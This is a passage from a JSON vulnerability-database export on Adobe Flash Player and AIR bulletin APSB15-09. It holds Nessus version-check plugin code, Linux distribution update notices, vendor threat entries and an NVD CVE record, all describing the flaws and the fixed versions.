value:\"p-cpe:/a:freebsd:freebsd:linux-c6-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"linux-c6-flashplugin<=11.2r202.457\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-f10-flashplugin<=11.2r202.457\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T03:26:52", "description": "According to its version, the installation of Adobe AIR on the remote\nMac OS X host is equal or prior to 17.0.0.144. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An unspecified security bypass vulnerability exists that\n allows an attacker to disclose sensitive information.\n (CVE-2015-3044)\n\n - Multiple unspecified type confusion flaws exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-3077, CVE-2015-3084, CVE-2015-3086)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. A remote attacker can\n exploit these flaws, via specially crafted flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-3078, CVE-2015-3089, CVE-2015-3090,\n CVE-2015-3093)\n\n - An unspecified security bypass exists that allows a\n context-dependent attacker to disclose sensitive\n information. (CVE-2015-3079)\n\n - An unspecified use-after-free error exists that allows\n an attacker to execute arbitrary code. (CVE-2015-3080)\n\n - An unspecified time-of-check time-of-use (TOCTOU) race\n condition exists that allows an attacker to bypass\n Protected Mode for Internet Explorer. (CVE-2015-3081)\n\n - Multiple validation bypass vulnerabilities exist that\n allow an attacker to read and write arbitrary data to\n the file system. (CVE-2015-3082, CVE-2015-3083,\n CVE-2015-3085)\n\n - An integer overflow condition exists due to improper\n validation of user-supplied input. This allows a\n context-dependent attacker to execute arbitrary code.\n (CVE-2015-3087)\n\n - A heap-based buffer overflow exists due to improper\n validation of user-supplied input. A remote attacker can\n exploit this to execute arbitrary code. (CVE-2015-3088)\n\n - Multiple unspecified memory leaks exist that allow an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. (CVE-2015-3091,\n CVE-2015-3092)", "edition": 26, "published": "2015-06-12T00:00:00", "title": "Adobe AIR for Mac <= 17.0.0.144 Multiple Vulnerabilities (APSB15-09)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:adobe:air"], "id": "MACOSX_ADOBE_AIR_APSB15-09.NASL", "href": "https://www.tenable.com/plugins/nessus/84161", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84161);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\n \"CVE-2015-3044\",\n \"CVE-2015-3077\",\n \"CVE-2015-3078\",\n \"CVE-2015-3079\",\n \"CVE-2015-3080\",\n \"CVE-2015-3081\",\n \"CVE-2015-3082\",\n \"CVE-2015-3083\",\n \"CVE-2015-3084\",\n \"CVE-2015-3085\",\n \"CVE-2015-3086\",\n \"CVE-2015-3087\",\n \"CVE-2015-3088\",\n \"CVE-2015-3089\",\n \"CVE-2015-3090\",\n \"CVE-2015-3091\",\n \"CVE-2015-3092\",\n \"CVE-2015-3093\"\n );\n script_bugtraq_id(\n 74605,\n 74608,\n 74609,\n 74610,\n 74612,\n 74613,\n 74614,\n 74616,\n 74617\n );\n\n script_name(english:\"Adobe AIR for Mac <= 17.0.0.144 Multiple Vulnerabilities (APSB15-09)\");\n script_summary(english:\"Checks the version gathered by local check.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host has a version of Adobe AIR installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the installation of Adobe AIR on the remote\nMac OS X host is equal or prior to 17.0.0.144. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An unspecified security bypass vulnerability exists that\n allows an attacker to disclose sensitive information.\n (CVE-2015-3044)\n\n - Multiple unspecified type confusion flaws exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-3077, CVE-2015-3084, CVE-2015-3086)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. A remote attacker can\n exploit these flaws, via specially crafted flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-3078, CVE-2015-3089, CVE-2015-3090,\n CVE-2015-3093)\n\n - An unspecified security bypass exists that allows a\n context-dependent attacker to disclose sensitive\n information. (CVE-2015-3079)\n\n - An unspecified use-after-free error exists that allows\n an attacker to execute arbitrary code. (CVE-2015-3080)\n\n - An unspecified time-of-check time-of-use (TOCTOU) race\n condition exists that allows an attacker to bypass\n Protected Mode for Internet Explorer. (CVE-2015-3081)\n\n - Multiple validation bypass vulnerabilities exist that\n allow an attacker to read and write arbitrary data to\n the file system. (CVE-2015-3082, CVE-2015-3083,\n CVE-2015-3085)\n\n - An integer overflow condition exists due to improper\n validation of user-supplied input. This allows a\n context-dependent attacker to execute arbitrary code.\n (CVE-2015-3087)\n\n - A heap-based buffer overflow exists due to improper\n validation of user-supplied input. A remote attacker can\n exploit this to execute arbitrary code. (CVE-2015-3088)\n\n - Multiple unspecified memory leaks exist that allow an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. (CVE-2015-3091,\n CVE-2015-3092)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe AIR 17.0.0.172 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-3093\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ShaderJob Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:air\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_adobe_air_installed.nasl\");\n script_require_keys(\"MacOSX/Adobe_AIR/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nkb_base = \"MacOSX/Adobe_AIR\";\nversion = get_kb_item_or_exit(kb_base+\"/Version\");\npath = get_kb_item_or_exit(kb_base+\"/Path\");\n\n# nb: we're checking for versions less than *or equal to* the cutoff!\ncutoff_version = '17.0.0.144';\nfixed_version_for_report = '17.0.0.172';\n\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version_for_report +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Adobe AIR\", version, path);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T12:46:24", "bulletinFamily": "unix", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "description": "The Adobe flash-player package was updated to version 11.2.202.460 to fix\n several security issues.\n\n The following vulnerabilities were fixed (bsc#930677):\n * APSB15-09, CVE-2015-3044, CVE-2015-3077, CVE-2015-3078, CVE-2015-3079,\n CVE-2015-3080, CVE-2015-3081, CVE-2015-3082, CVE-2015-3083,\n CVE-2015-3084, CVE-2015-3085, CVE-2015-3086, CVE-2015-3087,\n CVE-2015-3088, CVE-2015-3089, CVE-2015-3090, CVE-2015-3091,\n CVE-2015-3092, CVE-2015-3093\n\n More information can be found at the Adobe Security Bulletin APSB15-09:\n <a rel=\"nofollow\" href=\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\">https://helpx.adobe.com/security/products/flash-player/apsb15-09.html</a>\n\n", "edition": 1, "modified": "2015-05-16T00:05:04", "published": "2015-05-16T00:05:04", "id": "OPENSUSE-SU-2015:0890-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00010.html", "title": "Security update for flash-player (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:09:51", "bulletinFamily": "unix", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "description": "The Adobe flash-player package was updated to version 11.2.202.460 to fix\n several security issues.\n\n The following vulnerabilities were fixed (bsc#930677):\n * APSB15-09, CVE-2015-3044, CVE-2015-3077, CVE-2015-3078, CVE-2015-3079,\n CVE-2015-3080, CVE-2015-3081, CVE-2015-3082, CVE-2015-3083,\n CVE-2015-3084, CVE-2015-3085, CVE-2015-3086, CVE-2015-3087,\n CVE-2015-3088, CVE-2015-3089, CVE-2015-3090, CVE-2015-3091,\n CVE-2015-3092, CVE-2015-3093\n\n More information can be found at the Adobe Security Bulletin APSB15-09:\n <a rel=\"nofollow\" href=\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\">https://helpx.adobe.com/security/products/flash-player/apsb15-09.html</a>\n\n", "edition": 1, "modified": "2015-05-14T20:04:55", "published": "2015-05-14T20:04:55", "id": "SUSE-SU-2015:0878-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00007.html", "title": "Security update for flash-player (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:13:40", "bulletinFamily": "unix", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "description": "The Adobe flash-player package was updated to version 11.2.202.460 to fix\n several security issues.\n\n The following vulnerabilities were fixed (bsc#930677):\n * APSB15-09, CVE-2015-3044, CVE-2015-3077, CVE-2015-3078, CVE-2015-3079,\n CVE-2015-3080, CVE-2015-3081, CVE-2015-3082, CVE-2015-3083,\n CVE-2015-3084, CVE-2015-3085, CVE-2015-3086, CVE-2015-3087,\n CVE-2015-3088, CVE-2015-3089, CVE-2015-3090, CVE-2015-3091,\n CVE-2015-3092, CVE-2015-3093\n\n More information can be found at the Adobe Security Bulletin APSB15-09:\n <a rel=\"nofollow\" href=\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\">https://helpx.adobe.com/security/products/flash-player/apsb15-09.html</a>\n\n", "edition": 1, "modified": "2015-05-19T17:04:53", "published": "2015-05-19T17:04:53", "id": "OPENSUSE-SU-2015:0914-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00016.html", "title": "Security update for flash-player (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:15", "bulletinFamily": "unix", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "description": "### Background\n\nThe Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, obtain sensitive information, or bypass security restrictions. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Adobe Flash Player users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-plugins/adobe-flash-11.2.202.460\"", "edition": 1, "modified": "2015-05-31T00:00:00", "published": "2015-05-31T00:00:00", "id": "GLSA-201505-02", "href": "https://security.gentoo.org/glsa/201505-02", "type": "gentoo", "title": "Adobe Flash Player: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "kaspersky": [{"lastseen": "2020-09-02T11:42:03", "bulletinFamily": "info", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "description": "### *Detect date*:\n05/12/2015\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Adobe products. Malicious users can exploit these vulnerabilities to write local files, bypass security restrictions, execute arbitrary code or obtain sensitive information.\n\n### *Affected products*:\nAdobe Flash Player versions earlier than 17.0.0.188 for OS X and Windows \nAdobe Flash Player ESR versions earlier than 13.0.0.289 \nAdobe Flash Player versions earlier than 11.2.202.460 for Linux \nAdobe AIR runtime, SDK and Compiler versions earlier than 17.0.0.172\n\n### *Solution*:\nUpdate to the latest version \n[Get Flash Player](<https://get.adobe.com/flashplayer/>) \n[Get AIR](<https://get.adobe.com/air/>)\n\n### *Original advisories*:\n[Adobe bulletin](<https://helpx.adobe.com/security/products/flash-player/apsb15-09.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Adobe Flash Player ActiveX](<https://threats.kaspersky.com/en/product/Adobe-Flash-Player-ActiveX/>)\n\n### *CVE-IDS*:\n[CVE-2015-3044](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3044>)5.0Critical \n[CVE-2015-3089](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3089>)10.0Critical \n[CVE-2015-3088](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3088>)10.0Critical \n[CVE-2015-3084](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3084>)10.0Critical \n[CVE-2015-3086](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3086>)10.0Critical \n[CVE-2015-3091](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3091>)5.0Critical \n[CVE-2015-3078](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3078>)10.0Critical \n[CVE-2015-3079](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3079>)5.0Critical \n[CVE-2015-3080](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3080>)10.0Critical \n[CVE-2015-3081](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3081>)4.3Warning \n[CVE-2015-3092](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3092>)5.0Critical \n[CVE-2015-3090](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3090>)10.0Critical \n[CVE-2015-3087](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3087>)10.0Critical \n[CVE-2015-3077](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3077>)10.0Critical \n[CVE-2015-3085](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3085>)6.4High \n[CVE-2015-3083](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3083>)6.4High \n[CVE-2015-3082](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3082>)6.4High \n[CVE-2015-3093](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3093>)10.0Critical\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 41, "modified": "2020-06-18T00:00:00", "published": "2015-05-12T00:00:00", "id": "KLA10574", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10574", "title": "\r KLA10574Multiple vulnerabilities in Adobe Flash Player ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T12:00:17", "bulletinFamily": "info", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "description": "### *Detect date*:\n05/12/2015\n\n### *Severity*:\nCritical\n\n### *Description*:\nGoogle Chrome was updated to address vulnerabilities in Flash Player. For details look at KLA10574.\n\n### *Affected products*:\nGoogle Chrome versions earlier than 42.0.2311.152\n\n### *Solution*:\nUpdate to the latest version. File with name old_chrome can be still detected after update. It caused by Google Chrome update policy which does not remove old versions when installing updates. Try to contact vendor for further delete instructions or ignore such kind of alerts at your own risk. \n[Get Google Chrome](<https://www.google.com/chrome/browser/desktop/>)\n\n### *Original advisories*:\n[Google blog record](<http://googlechromereleases.blogspot.ru/2015/05/stable-channel-update.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed:+GoogleChromeReleases+\\(Google+Chrome+Releases\\)>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Google Chrome](<https://threats.kaspersky.com/en/product/Google-Chrome/>)\n\n### *CVE-IDS*:\n[CVE-2015-3044](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3044>)5.0Critical \n[CVE-2015-3089](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3089>)10.0Critical \n[CVE-2015-3088](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3088>)10.0Critical \n[CVE-2015-3084](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3084>)10.0Critical \n[CVE-2015-3086](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3086>)10.0Critical \n[CVE-2015-3091](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3091>)5.0Critical \n[CVE-2015-3078](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3078>)10.0Critical \n[CVE-2015-3079](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3079>)5.0Critical \n[CVE-2015-3080](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3080>)10.0Critical \n[CVE-2015-3081](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3081>)4.3Warning \n[CVE-2015-3092](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3092>)5.0Critical \n[CVE-2015-3090](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3090>)10.0Critical \n[CVE-2015-3087](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3087>)10.0Critical \n[CVE-2015-3077](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3077>)10.0Critical \n[CVE-2015-3085](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3085>)6.4High \n[CVE-2015-3083](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3083>)6.4High \n[CVE-2015-3082](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3082>)6.4High \n[CVE-2015-3093](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3093>)10.0Critical\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 43, "modified": "2020-06-18T00:00:00", "published": "2015-05-12T00:00:00", "id": "KLA10576", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10576", "title": "\r KLA10576Flash Player update for Google Chrome ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:00", "bulletinFamily": "software", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "description": "Buffer overflows, memory corruptions, integer overflows, race conditions, restriction bypass.", "edition": 1, "modified": "2015-05-13T00:00:00", "published": "2015-05-13T00:00:00", "id": "SECURITYVULNS:VULN:14490", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14490", "title": "Adobe Flash Player multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:16", "bulletinFamily": "unix", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "description": "\nAdobe reports:\n\n\n\t Adobe has released security updates for Adobe Flash Player for\n\t Windows, Macintosh and Linux. These updates address vulnerabilities\n\t that could potentially allow an attacker to take control of the\n\t affected system. Adobe recommends users update their product\n\t installations to the latest versions.\n\t \n\n\t These updates resolve memory corruption vulnerabilities that could\n\t lead to code execution (CVE-2015-3078, CVE-2015-3089, CVE-2015-3090,\n\t CVE-2015-3093).\n\t \n\n\t These updates resolve a heap overflow vulnerability that could lead\n\t to code execution (CVE-2015-3088).\n\t \n\n\t These updates resolve a time-of-check time-of-use (TOCTOU) race\n\t condition that could be exploited to bypass Protected Mode in\n\t Internet Explorer (CVE-2015-3081).\n\t \n\n\t These updates resolve validation bypass issues that could be\n\t exploited to write arbitrary data to the file system under user\n\t permissions (CVE-2015-3082, CVE-2015-3083, CVE-2015-3085).\n\t \n\n\t These updates resolve an integer overflow vulnerability that could\n\t lead to code execution (CVE-2015-3087).\n\t \n\n\t These updates resolve a type confusion vulnerability that could lead\n\t to code execution (CVE-2015-3077, CVE-2015-3084, CVE-2015-3086).\n\t \n\n\t These updates resolve a use-after-free vulnerability that could lead\n\t to code execution (CVE-2015-3080).\n\t \n\n\t These updates resolve memory leak vulnerabilities that could be used\n\t to bypass ASLR (CVE-2015-3091, CVE-2015-3092).\n\t \n\n\t These updates resolve a security bypass vulnerability that could lead\n\t to information disclosure (CVE-2015-3079), and provide additional\n\t hardening to protect against CVE-2015-3044.\n\t \n\n", "edition": 4, "modified": "2015-05-12T00:00:00", "published": "2015-05-12T00:00:00", "id": "E206DF57-F97B-11E4-B799-C485083CA99C", "href": "https://vuxml.freebsd.org/freebsd/e206df57-f97b-11e4-b799-c485083ca99c.html", "title": "Adobe Flash Player -- critical vulnerabilities", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2020-12-09T20:03:03", "description": "Adobe Flash Player before 13.0.0.289 and 14.x through 17.x before 17.0.0.188 on Windows and OS X and before 11.2.202.460 on Linux, Adobe AIR before 17.0.0.172, Adobe AIR SDK before 17.0.0.172, and Adobe AIR SDK & Compiler before 17.0.0.172 do not properly restrict discovery of memory addresses, which allows attackers to bypass the ASLR protection mechanism via unspecified vectors, a different vulnerability than CVE-2015-3092.", "edition": 5, "cvss3": {}, "published": "2015-05-13T11:00:00", "title": "CVE-2015-3091", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3091"], "modified": "2017-01-03T03:00:00", "cpe": ["cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:11.2.202.475", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:air_sdk_\\&_compiler:17.0.0.144", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:17.0.0.169", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/a:adobe:air_sdk:17.0.0.144", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/a:adobe:air:17.0.0.144", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "id": "CVE-2015-3091", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3091", "cvss": {"score": 5.0, "vector": 